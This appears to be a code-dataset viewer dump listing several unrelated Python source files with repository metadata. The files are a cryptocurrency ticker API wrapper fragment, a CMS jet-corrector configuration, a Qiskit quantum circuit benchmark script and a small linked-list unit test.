'Hi Mutual Society': 'Hi Mutual Society',
'iCoin': 'iCoin',
'Maggie': 'Maggie',
'MIOTA': 'IOTA',
'NetCoin': 'NetCoin',
'Polcoin': 'Polcoin',
}
if name in currencies:
return currencies[name]
return base
def fetch_markets(self):
markets = self.publicGetTicker({
'limit': 0,
})
result = []
for p in range(0, len(markets)):
market = markets[p]
currencies = self.currencyCodes
for i in range(0, len(currencies)):
quote = currencies[i]
quoteId = quote.lower()
baseId = market['id']
base = self.currency_code(market['symbol'], market['name'])
symbol = base + '/' + quote
id = baseId + '/' + quoteId
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'info': market,
})
return result
def fetch_global(self, currency='USD'):
self.load_markets()
request = {}
if currency:
request['convert'] = currency
return self.publicGetGlobal(request)
def parse_ticker(self, ticker, market=None):
timestamp = self.milliseconds()
if 'last_updated' in ticker:
if ticker['last_updated']:
timestamp = int(ticker['last_updated']) * 1000
change = None
if 'percent_change_24h' in ticker:
if ticker['percent_change_24h']:
change = self.safe_float(ticker, 'percent_change_24h')
last = None
symbol = None
volume = None
if market:
priceKey = 'price_' + market['quoteId']
if priceKey in ticker:
if ticker[priceKey]:
last = self.safe_float(ticker, priceKey)
symbol = market['symbol']
volumeKey = '24h_volume_' + market['quoteId']
if volumeKey in ticker:
if ticker[volumeKey]:
volume = self.safe_float(ticker, volumeKey)
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': None,
'low': None,
'bid': None,
'bidVolume': None,
'ask': None,
'askVolume': None,
'vwap': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': change,
'percentage': None,
'average': None,
'baseVolume': None,
'quoteVolume': volume,
'info': ticker,
}
def fetch_tickers(self, currency='USD', params={}):
self.load_markets()
request = {
'limit': 10000,
}
if currency:
request['convert'] = currency
response = self.publicGetTicker(self.extend(request, params))
tickers = {}
for t in range(0, len(response)):
ticker = response[t]
currencyId = self.currencies[currency]['id'] if (currency in list(self.currencies.keys())) else currency.lower()
id = ticker['id'] + '/' + currencyId
symbol = id
market = None
if id in self.markets_by_id:
market = self.markets_by_id[id]
symbol = market['symbol']
tickers[symbol] = self.parse_ticker(ticker, market)
return tickers
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = self.extend({
'convert': market['quote'],
'id': market['baseId'],
}, params)
response = self.publicGetTickerId(request)
ticker = response[0]
return self.parse_ticker(ticker, market)
def fetch_currencies(self, params={}):
currencies = self.publicGetTicker(self.extend({
'limit': 0,
}, params))
result = {}
for i in range(0, len(currencies)):
currency = currencies[i]
id = currency['symbol']
name = currency['name']
precision = 8
code = self.currency_code(id, name)
result[code] = {
'id': id,
'code': code,
'info': currency,
'name': name,
'active': True,
'status': 'ok',
'fee': None,
'precision': precision,
'limits': {
'amount': {
'min': math.pow(10, -precision),
'max': math.pow(10, precision),
},
'price': {
'min': math.pow(10, -precision),
'max': math.pow(10, precision),
},
'cost': {
'min': None,
'max': None,
},
'withdraw': {
'min': None,
'max': None,
},
},
}
return result
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'][api] + '/' + self.version + '/' + self.implode_params(path, params)
query = self.omit(params, self.extract_params(path))
if query:
url += '?' + self.urlencode(query)
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def request(self, path, api='public', method='GET', params={}, headers=None, body=None):
response = self.fetch2(path, api, method, params, headers, body)
if 'error' in response:
if response['error']:
raise ExchangeError(self.id + ' ' + self.json(response))
return response
| true | true |
1c3caf08ced27c0e5cd877306734982c58b8fdb5 | 239 | py | Python | HLTrigger/Configuration/python/HLT_75e33/modules/hltAK4PFPuppiJetCorrectorL2_cfi.py | PKUfudawei/cmssw | 8fbb5ce74398269c8a32956d7c7943766770c093 | [
"Apache-2.0"
] | 1 | 2021-11-30T16:24:46.000Z | 2021-11-30T16:24:46.000Z | HLTrigger/Configuration/python/HLT_75e33/modules/hltAK4PFPuppiJetCorrectorL2_cfi.py | PKUfudawei/cmssw | 8fbb5ce74398269c8a32956d7c7943766770c093 | [
"Apache-2.0"
] | 4 | 2021-11-29T13:57:56.000Z | 2022-03-29T06:28:36.000Z | HLTrigger/Configuration/python/HLT_75e33/modules/hltAK4PFPuppiJetCorrectorL2_cfi.py | PKUfudawei/cmssw | 8fbb5ce74398269c8a32956d7c7943766770c093 | [
"Apache-2.0"
] | 1 | 2021-11-30T16:16:05.000Z | 2021-11-30T16:16:05.000Z | import FWCore.ParameterSet.Config as cms
hltAK4PFPuppiJetCorrectorL2 = cms.EDProducer("LXXXCorrectorProducer",
#algorithm = cms.string('AK4PFPuppiHLT'),
algorithm = cms.string('AK4PFPuppi'),
level = cms.string('L2Relative')
)
| 29.875 | 69 | 0.748954 | import FWCore.ParameterSet.Config as cms
hltAK4PFPuppiJetCorrectorL2 = cms.EDProducer("LXXXCorrectorProducer",
algorithm = cms.string('AK4PFPuppi'),
level = cms.string('L2Relative')
)
| true | true |
1c3caf13a1646674626907addf5a607e3d1ada06 | 4,408 | py | Python | benchmark/startQiskit_QC2807.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | benchmark/startQiskit_QC2807.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | benchmark/startQiskit_QC2807.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | # qubit number=4
# total number=40
import cirq
import qiskit
from qiskit import IBMQ
from qiskit.providers.ibmq import least_busy
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2
import numpy as np
import networkx as nx
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.cx(input_qubit[0],input_qubit[3]) # number=13
prog.h(input_qubit[3]) # number=23
prog.cz(input_qubit[0],input_qubit[3]) # number=24
prog.y(input_qubit[1]) # number=37
prog.h(input_qubit[3]) # number=25
prog.x(input_qubit[3]) # number=18
prog.cx(input_qubit[0],input_qubit[3]) # number=19
prog.cx(input_qubit[0],input_qubit[3]) # number=15
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=3
prog.h(input_qubit[3]) # number=4
prog.y(input_qubit[3]) # number=12
prog.h(input_qubit[0]) # number=5
oracle = build_oracle(n-1, f)
prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]])
prog.h(input_qubit[1]) # number=6
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=32
prog.cx(input_qubit[3],input_qubit[0]) # number=20
prog.cx(input_qubit[3],input_qubit[0]) # number=26
prog.z(input_qubit[3]) # number=27
prog.h(input_qubit[0]) # number=29
prog.cz(input_qubit[3],input_qubit[0]) # number=30
prog.h(input_qubit[0]) # number=31
prog.h(input_qubit[0]) # number=33
prog.cz(input_qubit[3],input_qubit[0]) # number=34
prog.h(input_qubit[0]) # number=35
prog.h(input_qubit[2]) # number=36
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[0]) # number=9
prog.y(input_qubit[2]) # number=10
prog.y(input_qubit[2]) # number=11
prog.y(input_qubit[1]) # number=38
prog.y(input_qubit[1]) # number=39
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
a = "111"
b = "0"
f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b)
prog = make_circuit(4,f)
IBMQ.load_account()
provider = IBMQ.get_provider(hub='ibm-q')
provider.backends()
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 2 and not x.configuration().simulator and x.status().operational == True))
sample_shot =8000
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_QC2807.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.__len__(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| 35.264 | 165 | 0.655172 |
import cirq
import qiskit
from qiskit import IBMQ
from qiskit.providers.ibmq import least_busy
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2
import numpy as np
import networkx as nx
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
def build_oracle(n: int, f) -> QuantumCircuit:
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.cx(input_qubit[0],input_qubit[3])
prog.h(input_qubit[3])
prog.cz(input_qubit[0],input_qubit[3])
prog.y(input_qubit[1])
prog.h(input_qubit[3])
prog.x(input_qubit[3])
prog.cx(input_qubit[0],input_qubit[3])
prog.cx(input_qubit[0],input_qubit[3])
prog.h(input_qubit[1])
prog.h(input_qubit[2])
prog.h(input_qubit[3])
prog.y(input_qubit[3])
prog.h(input_qubit[0])
oracle = build_oracle(n-1, f)
prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]])
prog.h(input_qubit[1])
prog.h(input_qubit[2])
prog.h(input_qubit[3])
prog.cx(input_qubit[3],input_qubit[0])
prog.cx(input_qubit[3],input_qubit[0])
prog.z(input_qubit[3])
prog.h(input_qubit[0])
prog.cz(input_qubit[3],input_qubit[0])
prog.h(input_qubit[0])
prog.h(input_qubit[0])
prog.cz(input_qubit[3],input_qubit[0])
prog.h(input_qubit[0])
prog.h(input_qubit[2])
prog.h(input_qubit[3])
prog.h(input_qubit[0])
prog.y(input_qubit[2])
prog.y(input_qubit[2])
prog.y(input_qubit[1])
prog.y(input_qubit[1])
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
a = "111"
b = "0"
f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b)
prog = make_circuit(4,f)
IBMQ.load_account()
provider = IBMQ.get_provider(hub='ibm-q')
provider.backends()
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 2 and not x.configuration().simulator and x.status().operational == True))
sample_shot =8000
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_QC2807.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.__len__(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| true | true |
1c3cb0095cb31ff4dd18af04d18443ae107f4042 | 528 | py | Python | chapter_2/2.3.py | frbaroni/ctci | ff2f308aae76ab0e3dde09c7f88f37b86073cb38 | [
"MIT"
] | null | null | null | chapter_2/2.3.py | frbaroni/ctci | ff2f308aae76ab0e3dde09c7f88f37b86073cb38 | [
"MIT"
] | null | null | null | chapter_2/2.3.py | frbaroni/ctci | ff2f308aae76ab0e3dde09c7f88f37b86073cb38 | [
"MIT"
] | null | null | null | import unittest
from mylist import LinkedList
def deleteElement(node):
node.data = node.next.data
node.next = node.next.next
class Playground(unittest.TestCase):
def test_1(self):
A = LinkedList.create([1, 2, 3])
E = [1, 3]
deleteElement(A.next)
self.assertEqual(A.toList(), E)
def test_1(self):
A = LinkedList.create([1, 2, 3])
E = [2, 3]
deleteElement(A)
self.assertEqual(A.toList(), E)
if __name__ == '__main__':
unittest.main()
| 22.956522 | 40 | 0.589015 | import unittest
from mylist import LinkedList
def deleteElement(node):
node.data = node.next.data
node.next = node.next.next
class Playground(unittest.TestCase):
def test_1(self):
A = LinkedList.create([1, 2, 3])
E = [1, 3]
deleteElement(A.next)
self.assertEqual(A.toList(), E)
def test_1(self):
A = LinkedList.create([1, 2, 3])
E = [2, 3]
deleteElement(A)
self.assertEqual(A.toList(), E)
if __name__ == '__main__':
unittest.main()
| true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.